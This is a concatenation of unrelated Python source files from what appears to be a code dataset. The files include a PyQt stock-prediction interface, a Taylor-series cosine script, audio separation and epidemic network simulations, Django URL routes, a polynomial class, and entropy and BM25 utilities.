def plot_graph(self, subplot):
df = self.session.current_df
current_date = datetime.datetime.now()
df = df['Close']
if self.session.timeperiod == 'All':
if len(df):
df.plot(ax=subplot, lw=0.75, title=self.session.current_stock_ticker(), color='#FF8C00')
elif self.session.timeperiod == '5Y':
year = current_date.year-5
df = df.loc[f'{year}-{current_date.month}-{current_date.day}':]
if len(df):
df.plot(ax=subplot, lw=0.75, title=self.session.current_stock_ticker(), color='#FF8C00')
elif self.session.timeperiod == '1Y':
year = current_date.year-1
df = df.loc[f'{year}-{current_date.month}-{current_date.day}':]
if len(df):
df.plot(ax=subplot, lw=0.75, title=self.session.current_stock_ticker(), color='#FF8C00')
elif self.session.timeperiod == '3M':
month = (current_date.month-3) % 12
year = current_date.year
if month != current_date.month-3:
year = current_date.year-1
df = df.loc[f'{year}-{month}-{current_date.day}':]
if len(df):
df.plot(ax=subplot, lw=0.75, title=self.session.current_stock_ticker(), color='#FF8C00')
elif self.session.timeperiod == '1M':
month = (current_date.month-1) % 12
year = current_date.year
if month != current_date.month-1:
year = current_date.year-1
df = df.loc[f'{year}-{month}-{current_date.day}':]
if len(df):
df.plot(ax=subplot, lw=0.75, title=self.session.current_stock_ticker(), color='#FF8C00')
def predict_clicked(self):
self.pred_screen = MasterPredictionScreen(self)
class LoadingScreen(QWidget):
def __init__(self, master=None):
super().__init__()
self.master = master
self.session = self.master.session
self.initui()
self.thread = BackgroundTask(self)
self.thread.completed.connect(self.complete)
self.thread.start()
self.show()
def initui(self):
self.main_layout = QHBoxLayout(self)
self.main_layout.setContentsMargins(0, 0, 0, 0)
self.loading_screen = QWidget()
# Loading screen.
self.loading_gbox = QGroupBox()
self.loading_gbox.setStyleSheet(f'QGroupBox {{background-color: {DARK_GREY}; border: 0px}}')
self.loading_layout = QVBoxLayout()
self.loading_layout.setContentsMargins(0, 0, 0, 0)
self.loading_gbox.setLayout(self.loading_layout)
self.loading_label = QLabel("GENERATING PREDICTION ...")
self.loading_label.setStyleSheet('QLabel {color: white}')
self.loading_label.setFont(Font(20))
self.loading_layout.addWidget(self.loading_label)
self.loading_container = QHBoxLayout()
self.loading_container.setContentsMargins(0, 0, 0, 0)
self.loading_container.addWidget(self.loading_gbox)
self.loading_screen.setLayout(self.loading_container)
self.main_layout.addWidget(self.loading_screen)
self.setLayout(self.main_layout)
def complete(self, prediction):
self.master.show_window(1, PredictionScreen, prediction)
class PredictionScreen(QWidget):
def __init__(self, prediction, session):
super().__init__()
self.predictions = prediction
print(self.predictions)
self.session = session
if len(self.predictions) != 2:
self.initui()
def initui(self):
self.container = QWidget()
self.container.setStyleSheet(f'QWidget{{background-color: {DARK_GREY}}}')
self.ticker_layout = QHBoxLayout()
self.ticker_l = Label(self.session.current_stock_ticker())
self.ticker_layout.addWidget(self.ticker_l)
self.ticker_layout.addStretch()
self.main_layout = QVBoxLayout()
self.labels_l = QHBoxLayout()
self.prediction_head_l = QLabel('PREDICTION')
self.prediction_head_l.setStyleSheet(f'QLabel{{color: {LIGHT_ORANGE}; background-color: {GREY}; padding: 16px}}')
self.prediction_head_l.setFont(Font(12))
self.prediction_head_l.setAlignment(Qt.AlignCenter)
self.accuracy_head_l = QLabel('ACCURACY')
self.accuracy_head_l.setStyleSheet(f'QLabel{{color: {LIGHT_ORANGE}; background-color: {GREY}; padding: 16px}}')
self.accuracy_head_l.setFont(Font(12))
self.accuracy_head_l.setAlignment(Qt.AlignCenter)
self.days_head_l = QLabel('DAYS')
self.days_head_l.setStyleSheet(f'QLabel{{color: {LIGHT_ORANGE}; background-color: {GREY}; padding: 16px}}')
self.days_head_l.setFont(Font(12))
self.days_head_l.setAlignment(Qt.AlignCenter)
self.labels_l.addWidget(self.prediction_head_l)
self.labels_l.addWidget(self.accuracy_head_l)
self.labels_l.addWidget(self.days_head_l)
self.labels_l.setSpacing(1)
self.labels_l.setContentsMargins(0, 0, 0, 0)
self.main_layout.addLayout(self.ticker_layout)
self.main_layout.addLayout(self.labels_l)
self.container.setLayout(self.main_layout)
self.con_lay = QHBoxLayout()
self.con_lay.addWidget(self.container)
self.con_lay.setContentsMargins(0, 0, 0, 0)
self.setLayout(self.con_lay)
days_list = [1, 3, 7]
for i in range(3):
prediction = self.predictions[i]
prediction_layout = QHBoxLayout()
if prediction[0] == 1:
image = QPixmap('images/up_arrow.png')
else:
image = QPixmap('images/down_arrow.png')
self.prediction_l = QLabel()
self.prediction_l.setPixmap(image)
self.prediction_l.setAlignment(Qt.AlignCenter)
self.accuracy_l = QLabel(f'{str(prediction[1])}%')
self.accuracy_l.setStyleSheet(f'QLabel{{color: white}}')
self.accuracy_l.setFont(Font(20))
self.accuracy_l.setAlignment(Qt.AlignCenter)
self.days_l = QLabel(f'{str(days_list[i])}')
self.days_l.setStyleSheet(f'QLabel{{color: white}}')
self.days_l.setFont(Font(20))
self.days_l.setAlignment(Qt.AlignCenter)
prediction_layout.addWidget(self.prediction_l)
prediction_layout.addWidget(self.accuracy_l)
prediction_layout.addWidget(self.days_l)
self.main_layout.addLayout(prediction_layout)
# self.save_button = Button('SAVE')
# self.main_layout.addWidget(self.save_button)
self.setLayout(self.main_layout)
class MasterPredictionScreen(QDialog):
def __init__(self, master):
super().__init__(master)
self.setModal(True)
self.master = master
self.session = master.session
self.setWindowTitle('Fortune')
self.initui()
def initui(self):
self.stack = QStackedWidget(self)
self.stack.addWidget(LoadingScreen(self))
self.stack.addWidget(PredictionScreen(['', ''], self.session))
hbox = QHBoxLayout(self)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.stack)
self.setLayout(hbox)
self.stack.setCurrentIndex(0)
self.show()
def show_window(self, i, widget, a):
self.stack.removeWidget(self.stack.widget(i))
self.stack.insertWidget(i, widget(a, self.session))
self.stack.setCurrentIndex(i)
class ViewMyStocksScreen(QWidget):
def __init__(self, master=None):
super().__init__()
self.master = master
self.session = self.master.session
self.initui()
def initui(self):
self.stock_groupbox = QWidget()
g_style = 'QWidget{'
g_style += f'border: 1px solid {DARK_GREY}; background-color: {DARK_GREY}'
g_style += '}'
self.stock_groupbox.setStyleSheet(g_style)
self.stock_layout = QFormLayout()
self.buttons = []
for stock_id in self.session.stock_dict:
frame = QHBoxLayout()
stock_ticker = self.session.stock_dict[stock_id]
view_b = Button(stock_ticker, hover_colour=LIGHT_ORANGE, hover_border=LIGHT_ORANGE)
view_b.clicked.connect(partial(self.view_func, stock=stock_id))
delete_b = Button("DELETE", GREY, 'white', GREY, GREY, 'white', GREY)
delete_b.clicked.connect(partial(self.delete_func, stock=stock_id))
frame.addWidget(view_b)
frame.addStretch()
frame.addWidget(delete_b)
self.stock_layout.addRow(frame)
self.stock_groupbox.setLayout(self.stock_layout)
self.scroll = QScrollArea()
self.scroll.setWidget(self.stock_groupbox)
self.scroll.setWidgetResizable(True)
self.scroll.setStyleSheet('QScrollArea{border: 0px}')
self.main_layout = QVBoxLayout(self)
self.main_layout.setContentsMargins(0, 0, 0, 0)
self.main_layout.setSpacing(0)
self.menubar = Menubar(self)
self.menubar.view_b.setStyleSheet(f'color:{LIGHT_ORANGE}; background-color:{GREY}; border: 0px; padding: 16px')
self.main_layout.addWidget(self.menubar)
self.main_layout.addWidget(self.scroll)
def view_func(self, stock):
self.session.current_stock = stock # Changes the current stock to the chosen stock.
self.session.stock_change = True # Downloads a new dataframe.
self.master.show_window(1, MainScreen) # Goes back to the home screen.
def delete_func(self, stock):
pass
class SearchScreen(QWidget):
def __init__(self, master=None):
super().__init__()
self.master = master
self.session = self.master.session
self.initui()
def initui(self):
self.widget_list = []
self.master_layout = QHBoxLayout()
self.setStyleSheet(f'background-color: {DARK_GREY}')
self.master_container = QWidget()
self.main_layout = QVBoxLayout()
self.main_layout.setContentsMargins(0, 0, 0, 0)
self.main_layout.setSpacing(0)
self.menubar = Menubar(self)
self.menubar.addstock_b.setStyleSheet(f'color:{LIGHT_ORANGE}; background-color:{GREY}; border: 0px; padding: 16px')
self.search_bar = QHBoxLayout()
self.search_bar.setContentsMargins(20, 20, 20, 20)
self.search_bar.setSpacing(10)
self.search_e = QLineEdit()
self.search_e.setPlaceholderText("Enter Stock Ticker")
self.search_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white} QLineEdit:focus{border: 2px solid rgb(64, 64, 64)}')
self.search_b = Button(" GO ", hover_colour=LIGHT_ORANGE, hover_border=LIGHT_ORANGE)
self.search_b.clicked.connect(lambda: self.search_func())
self.search_bar.addWidget(self.search_e)
self.search_bar.addWidget(self.search_b)
self.main_layout.addWidget(self.menubar)
self.main_layout.addLayout(self.search_bar)
self.error_label = QLabel("Stock is invalid")
self.error_label.setStyleSheet('QLabel{background-color:'+WARM_RED+'; color: white; padding: 12px}')
font = Font(12)
self.error_label.setFont(font)
self.error_frame = QHBoxLayout()
self.error_frame.setContentsMargins(0, 0, 0.8*self.master.screen_width, 0)
self.error_frame.addWidget(self.error_label)
self.main_layout.insertLayout(1, self.error_frame)
self.error_label.setHidden(True)
self.f = Figure(figsize=(5, 5), dpi=100)
self.f.patch.set_facecolor('#202020')
self.a = self.f.add_subplot(111)
self.canvas = FigureCanvas(self.f)
self.canvas.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.main_layout.addWidget(self.canvas)
self.add_f = QHBoxLayout()
self.add_f.setContentsMargins(0.4*self.master.screen_width, 0, 0.4*self.master.screen_width, 0.1*self.master.screen_height)
self.add_b = Button("ADD STOCK", hover_colour=LIGHT_ORANGE, hover_border=LIGHT_ORANGE)
self.add_b.clicked.connect(lambda: self.add_clicked())
self.add_f.addWidget(self.add_b)
self.main_layout.addLayout(self.add_f)
self.master_container.setLayout(self.main_layout)
self.master_layout.addWidget(self.master_container)
self.master_layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(self.master_layout)
def search_func(self):
is_valid = False
stock_ticker = str(self.search_e.text()).upper()
try:
df = yf.download(stock_ticker)
except ValueError:
df = []
if len(df): # If the stock ticker is valid.
is_valid = True
self.error_label.setHidden(True)
self.search_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white} QLineEdit:focus{border: 2px solid rgb(64, 64, 64)}')
df = df['Close']
df.plot(ax=self.a, lw=0.75, title=stock_ticker, color='#FF8C00')
self.canvas.draw()
if not is_valid:
self.error_label.setHidden(False)
self.search_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white; border: 2px solid '+WARM_RED+'}')
def add_clicked(self):
stock = str(self.search_e.text()).upper()
is_valid = self.session.dbh.add_stock_to_db(stock, self.session.current_user.user_id)
if is_valid:
self.search_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white} QLineEdit:focus{border: 2px solid rgb(64, 64, 64)}')
self.session.update()
self.master.show_window(2, ViewMyStocksScreen)
else:
self.error_label.setHidden(False)
self.search_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white; border: 2px solid '+WARM_RED+'}')
def keyPressEvent(self, event):
if event.key() == 16777220: # Enter key - 16777220
self.search_func()
class Menubar(QGroupBox):
def __init__(self, parent_layout):
super().__init__()
font = Font(12)
self.style = 'QPushButton{'
self.style += f'color:{LIGHT_GREY}; background-color:{GREY}; border: 0px; padding: 16px'
self.style += '}'
self.style += 'QPushButton:Hover{'
self.style += f'color: white'
self.style += '}'
self.setStyleSheet('QGroupBox {background-color: '+GREY+'; border: 0px}')
self.parent_layout = parent_layout
self.layout = QHBoxLayout()
self.layout.setSpacing(0)
self.layout.setContentsMargins(0, 0, 0, 0)
self.home_b = QPushButton('HOME')
self.home_b.clicked.connect(lambda: self.parent_layout.master.show_window(1, MainScreen))
self.home_b.setFont(font)
self.home_b.setStyleSheet(self.style)
self.home_b.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Minimum)
self.layout.addWidget(self.home_b)
self.view_b = QPushButton('MY STOCKS')
self.view_b.clicked.connect(lambda: self.parent_layout.master.show_window(2, ViewMyStocksScreen))
self.view_b.setFont(font)
self.view_b.setStyleSheet(self.style)
self.view_b.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Minimum)
self.layout.addWidget(self.view_b)
self.addstock_b = QPushButton('SEARCH')
self.addstock_b.clicked.connect(lambda: self.parent_layout.master.show_window(3, SearchScreen))
self.addstock_b.setFont(font)
self.addstock_b.setStyleSheet(self.style)
self.addstock_b.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Minimum)
self.layout.addWidget(self.addstock_b)
self.logout_b = QPushButton('LOG OUT')
self.logout_b.clicked.connect(lambda: self.parent_layout.master.show_window(0, LoginScreen))
self.logout_b.setFont(font)
self.logout_b.setStyleSheet(self.style)
self.layout.addWidget(self.logout_b)
self.setLayout(self.layout)
class BackgroundTask(QThread):
completed = pyqtSignal(list)
def __init__(self, master):
super().__init__()
self.session = master.session
def run(self):
predictions = []
stock = self.session.current_stock_ticker()
for period in (1, 3, 7):
dnn = Dnn(stock=stock, period=period)
prediction = dnn.predict()
predictions.append(prediction)
self.completed.emit(predictions)
class Button(QPushButton):
def __init__(self, text, border_colour=ORANGE, bg=ORANGE, fg='white', hover_colour=None, hover_font=None, hover_border=None):
super().__init__(text)
self.style = f'QPushButton {{' \
f'color:{fg}; border-width:2px; border-style:solid; border-color:{border_colour};' \
f'border-radius:24px; padding:16px; background-color:{bg}}}' \
f'QPushButton:Hover {{' \
f'background-color: {hover_colour}; color: {hover_font}; border-color: {hover_border}}}'
self.setStyleSheet(self.style)
font = Font(12)
self.setFont(font)
class Label(QLabel):
def __init__(self, text):
super().__init__(text)
self.style = f'QLabel {{' \
f'color:white; border-width:2px; border-style:solid; border-color:{ORANGE}; border-radius:24px;' \
f'padding:16px; background-color:{ORANGE}}}'
self.setStyleSheet(self.style)
font = Font(12)
self.setFont(font)
class Font(QFont):
def __init__(self, size):
super().__init__()
self.setLetterSpacing(QFont.AbsoluteSpacing, 2)
self.setWeight(QFont.ExtraBold)
self.setStretch(110)
self.setPixelSize(size)
if __name__ == '__main__':
app = QApplication(sys.argv)
sizeObject = QDesktopWidget().screenGeometry(-1)
WIDTH = sizeObject.width()
HEIGHT = sizeObject.height()
app.setWindowIcon(QIcon('logo.png'))
ex = MainUi()
sys.exit(app.exec())
|
999,323 | ff29851cf95a40950e7745ff6004f411420d21cb | x = float(input())
k = int(input())
cos = 0
somar = True
for i in range(0, k+1, 2):
fat = 1
for j in range(1, i+1):
fat = fat * j
if somar:
cos = cos + x ** i / fat
somar = False
else:
cos = cos - x ** i / fat
somar = True
print(f"{cos:.4f}") |
999,324 | 790808832cc46336c1569bbad7c37701909ffa98 | import os
import sys
path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
if not path in sys.path:
sys.path.insert(1, path)
import nussl
def main():
# input audio file
input_name = os.path.join('..', 'Input','Sample1.wav')
signal = nussl.AudioSignal(path_to_input_file=input_name)
# make a directory to store output if needed
if not os.path.exists(os.path.join('..', 'Output')):
os.mkdir(os.path.join('..', 'Output'))
# Set up Repet
repet = nussl.Repet(signal)
# and Run
repet.run()
# Get foreground and background audio signals
bkgd, fgnd = repet.make_audio_signals()
# and write out to files
bkgd.write_audio_to_file(os.path.join('..', 'Output', 'Sample1_background.wav'))
fgnd.write_audio_to_file(os.path.join('..', 'Output', 'Sample1_foreground.wav'))
if __name__ == '__main__':
main()
|
999,325 | 117518aba332ca7bcb9c4c60f8f91b4034f86bf2 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 23 10:35:46 2020
@author: luca
"""
import numpy as np
import matplotlib.pyplot as plt
import numpy.random as rnd
from network4strel import BetaDistribution, LognormalDistribution, DiscreteDistribution, GammaDistribution, CategoricalDistribution, DeterministicCategoricalDistribution, StateTransitionModel, Network, NetworkSimulator, SimulationOutput
import time
import pickle
#fitted parameters of a lognormal of node degree
#shape,loc,scale = 0.7985868513480973, -1.0172598183244927, 11.737271521475328
#lognorm = LognormalDistribution(shape,loc,scale)
#infection_duration_distribution = DeterministicDiscreteDistribution(2)
with open("degree_dist_no_events.pickle","rb") as f:
base_degree_distribution = pickle.load(f)
with open("degree_dist_events.pickle","rb") as f:
event_degree_distribution = pickle.load(f)
event_probability_distribution = CategoricalDistribution([0.0,1.0/30,1.0/15,1.0/7,3.0/7],[0.2,0.2,0.2,0.2,0.2])
#rough
#80% asymptomatic, infective 1-2 days befor symptoms and 2-5 days after symptoms, equal probability.
infectivity_duration = DiscreteDistribution([0,100,100,125,250,250,250,125],7,"infection_duration")
delay_to_infectivity = GammaDistribution(1.87,1/0.28,max_range=15) #from merler
#init_dist = CategoricalDistribution(["S","I","R"],[0.995,0.005,0.0])
init_dist = CategoricalDistribution(["1","2","3","4"],[0.99,0.0,0.01,0.0])
#Beta distribution with mean 0.05
infection_probability_distribution = BetaDistribution(2,38)
node_number = 500
state_model = StateTransitionModel(states = ["1","2","3","4"],
susceptible = {"1":True,"2":False, "3":False, "4":False},
infective = {"1":False, "2":False, "3":True, "4":False},
has_age = {"1":False, "2":True, "3":True, "4":False},
age_distribution = {"2":delay_to_infectivity,
"3":infectivity_duration},
next_state = {"1":DeterministicCategoricalDistribution("2"),
"2":DeterministicCategoricalDistribution("3"),
"3":DeterministicCategoricalDistribution("4")},
initial_state = init_dist)
#state_model = StateTransitionModel(states = ["S","I","R"],
# susceptible = {"S":True, "I":False, "R":False},
# infective = {"S":False, "I":True, "R":False},
# has_age = {"S":False, "I":True, "R":False},
# age_distribution = {"I":DeterministicDistribution(2)},
# next_state = {"S":DeterministicCategoricalDistribution("I"),
# "I":DeterministicCategoricalDistribution("R")},
# initial_state = init_dist)
print("\n\n******************************")
t = time.process_time()
network = Network(node_number,state_model,base_degree_distribution,event_degree_distribution,event_probability_distribution,infection_probability_distribution)
t = time.process_time() - t
print("Network of {0:d} nodes created in {1:.6f} seconds".format(node_number,t))
max_steps = 100
runs=5
outfile = "strelsim.png"
t = time.process_time()
sim = NetworkSimulator(network,save_full_network = True)
out = sim.simulate(runs=runs,max_steps=max_steps)
t = time.process_time() - t
print("Simulation of {0:d} runs of {1:d} steps in {2:.6f} seconds".format(runs,max_steps,t))
#out.plot_trajectory(0,file=outfile)
x = out.peak_distribution()
x = x[out.mask_only_explosive]
print("mean size of infection peak is {0:.5f}".format(np.mean(x)/node_number))
y = out.peak_time_distribution()
y = y[out.mask_only_explosive]
print("mean peak time of infection in days: {0:.5f}".format(np.mean(y)))
|
999,326 | 50e018bf5f285d25561798c7da733509aadb0ae9 | from django.conf.urls import patterns, url
from control import views
urlpatterns = patterns(
'control.views',
url(r'^$', 'home', name="home"),
url(r'^sprinklers/', 'sprinklers', name='sprinklers'),
url(r'^accounts/', 'accounts', name='accounts'),
url(r'^logs/', 'logs', name='logs'),
url(r'^command/', 'command', name='command'),
)
|
999,327 | 9b326497b83f3dbe6d10eaf0ed6c8c26468bd7cb | class Polynomial:
def __init__(self, n, k=None):
self.degree = n
if k is None:
self.koef = [1 for i in range(n + 1)]
else:
if len(k) > n:
k = k[:n + 1]
elif len(k) < n:
k.extend([0.0 for i in range(n - len(k))])
self.koef = [x for x in k]
if len(self.koef) < self.degree + 1:
self.koef.extend([0 for i in range(self.degree - len(self.koef) + 1)])
def __mul__(self, other):
ret = Polynomial(self.degree, self.koef)
if isinstance(other, int) or isinstance(other, float):
for i in range(len(ret.koef)):
ret.koef[i] *= other
elif isinstance(other, Polynomial):
diff = other.degree + ret.degree
ext = [0.0 for i in range(diff + 1)]
for i in range(other.degree + 1):
for j in range(ret.degree + 1):
buff = ret.koef[j] * other.koef[i]
if buff == 0:
continue
else:
ext[diff - (ret.degree - j + other.degree - i)] += buff
ret.degree = diff
ret.koef = ext
else:
raise Exception
return ret
def __add__(self, other):
ret = Polynomial(self.degree, self.koef)
if isinstance(other, int) or isinstance(other, float):
ret.koef[-1] += other
elif isinstance(other, Polynomial):
if other.degree > ret.degree:
diff = other.degree - ret.degree
ret.degree += diff
ext = [0.0 for i in range(diff)]
ext.extend(ret.koef)
ret.koef = ext
i = ret.degree
while i != -1:
ret.koef[i] += other.koef[i]
i -= 1
elif other.degree < ret.degree:
buf = other.koef
diff = ret.degree - other.degree
ext = [0.0 for i in range(diff)]
ext.extend(buf)
i = ret.degree
while i != -1:
ret.koef[i] += ext[i]
i -= 1
else:
i = ret.degree
while i != -1:
ret.koef[i] += other.koef[i]
i -= 1
else:
raise Exception
return ret
def __sub__(self, other):
ret = Polynomial(self.degree, self.koef)
if isinstance(other, int) or isinstance(other, float):
ret.koef[-1] -= other
elif isinstance(other, Polynomial):
if other.degree > ret.degree:
diff = other.degree - ret.degree
ret.degree += diff
ext = [0.0 for i in range(diff)]
ext.extend(ret.koef)
ret.koef = ext
elif other.degree < ret.degree:
buf = other.koef
diff = ret.degree - other.degree
ext = [0.0 for i in range(diff)]
ext.extend(buf)
else:
ext = other.koef
i = ret.degree
while i != -1:
ret.koef[i] -= ext[i]
i -= 1
else:
raise Exception
return ret
def up_degree(self) :
self.degree += 1
self.koef.append(0.0)
def get(self, x):
res = 0.0
for i in range(self.degree + 1):
res += (self.koef[i] * (x ** (self.degree - i)))
return res
def integral(self):
ret = Polynomial(self.degree, self.koef)
ret.koef = [k / (self.degree - ret.koef.index(k) + 1) if k else k
for k in ret.koef]
ret.up_degree()
return ret
def integral_variable_up(self, down):
i = self.integral()
return i - i.get(down)
def __str__(self):
i = self.degree
prnt_str = ""
if not i:
prnt_str += "{0}".format(self.koef[0])
return prnt_str
for k in self.koef:
if k:
if not i:
prnt_str += " + {0}".format(k)
else:
if i != self.degree:
prnt_str += " + "
prnt_str += "{0}x^{1}".format(k, i)
i -= 1
return prnt_str |
999,328 | d0a138ed4de7cc216ae453949f961971b3b3f860 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@File : matht.py
@Author: sladesha
@Date : 2019/7/22 0:15
@Desc :
'''
import math
from .typet import is_type
import sys
from .listt import index_hash_map, Pi
from math import log
from math import e
__EPS = 1.4e-45
def entropy(props, type="list", explation=False):
'''
:param props:输入数据
:param type:"list"是实验出现的结果,和非1;"prob"是实验结果出现的频率,和为1
:param explation:是否提示结果的大小稳定度解释
:return:
'''
if explation:
print("the more the unstable")
if type not in ("list", "prob"):
raise ValueError("type should be list or prob,list be the expriment")
if type == "list":
if is_type(props, (list)):
prop = set(props)
resultEn = 0
for single in prop:
pi = Pi(single, props)
resultEn -= pi * math.log(pi)
return resultEn
elif is_type(props, (float, int)):
return -props * math.log(props)
else:
resultEn = 0
for pi in props:
resultEn -= pi * math.log(max(pi, __EPS))
return resultEn
raise TypeError
def condition_entropy(datax, datay, explation=False):
'''
:param datax:
:param datay:
:return:H(X/Y),条件熵,已知Y的情况下,X的不稳定性
:test:
condition_entropy([1,0,1,0],[2,3,2,3])------>__EPS
condition_entropy([1,1,0,0],[2,3,2,3])------>0.6931471805599453
'''
if explation:
print("the less the better")
if len(datax) != len(datay):
raise ValueError("datax and datay should be the same length")
resultConEn = 0 # 最终条件熵H(X|Y)
YElements = list(set(datay))
index_map = index_hash_map(datay)
for uniqueYEle in YElements:
YIndex = index_map.get(uniqueYEle)
# 找出dataY 里所有等于yi = YElements的索引值组成的列表
dataX_Y = []
# 拿出datax对应的index下的值
for idx in YIndex:
dataX_Y.append(datax[idx])
HX_uniqueYEle = max(entropy(dataX_Y), __EPS) # H(X|Y=yi)
pi = max(__EPS, Pi(uniqueYEle, datay)) # 此时可以计算 pi = p(Y=yi)
resultConEn += pi * HX_uniqueYEle # 求和 H(X|Y)= Σ p(Y=yi)*H(X|Y=yi)
return resultConEn # 返回条件熵 H(X|Y)
def MI(A, B, explation=False):
if explation:
print("the more the better")
return entropy(A) - condition_entropy(A, B)
def NMI(A, B, explation=False):
if explation:
print("the more the better")
total = len(A)
A_ids = set(A)
B_ids = set(B)
A_index_map = index_hash_map(A)
B_index_map = index_hash_map(B)
# 互信息计算
MI = 0
for idA in A_ids:
for idB in B_ids:
idAOccur = A_index_map.get(idA)
idBOccur = B_index_map.get(idB)
idABOccur = list(set(idAOccur) & set(idBOccur))
px = 1.0 * len(idAOccur) / total
py = 1.0 * len(idBOccur) / total
pxy = 1.0 * len(idABOccur) / total
MI = MI + pxy * math.log(pxy / (px * py) + __EPS)
# 标准化互信息
Hx = entropy(A)
Hy = entropy(B)
MIhat = 2.0 * MI / (Hx + Hy)
return MIhat
def ln(num):
return log(num, e)
def word_edit_distince(str1, str2):
# 构造(len(str1)+1) x (len(str2)+1)的矩阵,其中+1是为了考虑str1或者st2为空的情况
matrix = [[i + j for i in range(len(str2) + 1)] for j in range(len(str1) + 1)]
for i in range(1, len(str1) + 1):
for j in range(1, len(str2) + 1):
# 注意这边从1开始,所以比target和source的时候需要考虑-1
if str1[i - 1] == str2[j - 1]:
cost = 0
else:
cost = 1
# 上侧,左侧,左上侧
matrix[i][j] = min(matrix[i - 1][j] + 1, matrix[i][j - 1] + 1, matrix[i - 1][j - 1] + cost)
return matrix[len(str1)][len(str2)]
class BM25(object):
"""docstring for BM25"""
def __init__(self, docs):
self.docs = docs
self.idf = {}
# document frequenty
self.df = {}
# 每个doc中每个word的出现次数frequency
self.f = []
# 文章个数,平均文章长度
self.D = len(self.docs)
self.avgdl = sum(len(doc) for doc in self.docs) / self.D
# 可调参数
self.k1 = 1
self.b = 0.75
self.init()
def init(self):
for doc in self.docs:
tmp = {}
for word in doc:
tmp[word] = tmp.get(word, 0) + 1
self.f.append(tmp)
for key in tmp.keys():
self.df[key] = self.df.get(key, 0) + 1
for k, v in self.df.items():
self.idf[k] = math.log(self.D + 0.5) - math.log(v + 0.5)
def relation(self, doc, index):
score = 0
for word in doc:
if word not in self.f[index]:
continue
doc_len = len(self.docs[index])
fi = self.f[index].get(word)
score += (self.idf.get(word) * fi * (self.k1 + 1)) / (
fi + self.k1 * (1 - self.b + self.b * (doc_len / self.avgdl)))
return score
def similarity(self, doc):
scores = []
for i in range(self.D):
score = self.relation(doc, i)
scores.append(score)
return scores
def relative_entropy(probx, proby):
'''
:desc 相对熵,也叫KL散度
:param probx:
:param proby:
:return:H(p||q) = ∑pxlog(px/py),如果px与py分布一致,则return 0,差异越大return的值越大;H(p||q) = H(p,q) - H(p)
'''
if len(probx) != len(proby):
raise ValueError("input data should be the same length")
resultConEn = 0
for i in range(len(probx)):
resultConEn += probx[i] * math.log(max(probx[i] / max(proby[i], __EPS), __EPS))
return resultConEn
def cross_entropy(probx, proby):
'''
:desc 交叉熵
:param probx:
:param proby:
:return:∑pi*log(qi)
'''
if len(probx) != len(proby):
raise ValueError("input data should be the same length")
resultConEn = 0
for i in range(len(probx)):
resultConEn -= probx[i] * math.log(max(proby[i], __EPS), 2)
return resultConEn
def JSD(prob1, prob2):
'''
:desc 衡量prob1 和 prob2两个分布的相似程度
:param prob1:
:param prob2:
:return:
'''
if len(prob1) != len(prob2):
raise ValueError("input should be the same length")
prob1_norm = sum(abs(p) for p in prob1)
prob2_norm = sum(abs(p) for p in prob2)
prob1 = [p / prob1_norm for p in prob1]
prob2 = [p / prob2_norm for p in prob2]
middle = [(prob1[idx] + prob2[idx]) / 2 for idx in range(len(prob1))]
return 0.5 * (relative_entropy(prob1, middle) + relative_entropy(prob2, middle))
def Hellinger_Distince(prob1, prob2):
'''
:desc 海林格距离,用来衡量概率分布之间的相似性
:param prob1:
:param prob2:
:return:
'''
if len(prob1) != len(prob2):
raise ValueError("input should be the same length")
norm2 = math.sqrt(sum([(math.sqrt(prob1[idx]) - math.sqrt(prob2[idx])) ** 2 for idx in range(len(prob1))]))
return 1 / math.sqrt(2) * norm2
def isOdds(num):
'''
:desc 奇偶判断
:param num: 数值
:return:
'''
return True if int(num) & 1 else False
|
999,329 | 265270281c1f11b1e56393b76b1638fee3d8136b | # Copyright 2019 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module contains some helper methods and classes used across other packages
in Neptune.
"""
import importlib
import json
import pkgutil
import tornado
def list_submodules(package, recursive=True):
"""
Recursively (optional) find the submodules from a module or directory
Args:
package (str or module): Root module or directory to load submodules from
recursive (bool, optional): Recursively find. Defaults to True.
Returns:
array: array containing module paths that can be imported
"""
if isinstance(package, str):
package = importlib.import_module(package)
results = []
for _loader, name, is_pkg in pkgutil.walk_packages(package.__path__):
full_name = package.__name__ + '.' + name
results.append(full_name)
if recursive and is_pkg:
results.extend(list_submodules(full_name))
return results
def remove_prefix(text, prefix):
"""
Removes the prefix string from the text
Args:
text (str): The base string containing the prefixed string
prefix (str): Prefix to remove
Returns:
str: the base string with the prefix removed
"""
if text.startswith(prefix):
return text[len(prefix):]
return text
class DummyClass(object):
"""
This dummy class is used to hold attributes when destroying REST endpoints
in Tornado (server.py, DestructServiceHandler). There's no Tornado API for
this and the code from inside Tornado to do this expects an object
containing the request.
"""
pass
# https://stackoverflow.com/a/15721641
class MultiDimensionalArrayEncoder(json.JSONEncoder):
"""
This JSON encoder transforms tuples (which are not JSON serializable) into
arrays with a '__tuple__' key added. Then, when the JSON object is received,
it can be parsed with the hinted_tuple_hook below to reconstruct the tuple.
"""
def encode(self, obj):
"""
The base encode method of the JSON encoder is called with one additional
hook
"""
def hint_tuples(item):
"""
If the object to be serialized is a tuple, or contains tuples,
replace tuples with a dictionary that can be reconstructed on
the receiver
Args:
self (object): Object that will be JSON serialized
Returns:
object: Object without tuples
"""
if isinstance(item, tuple):
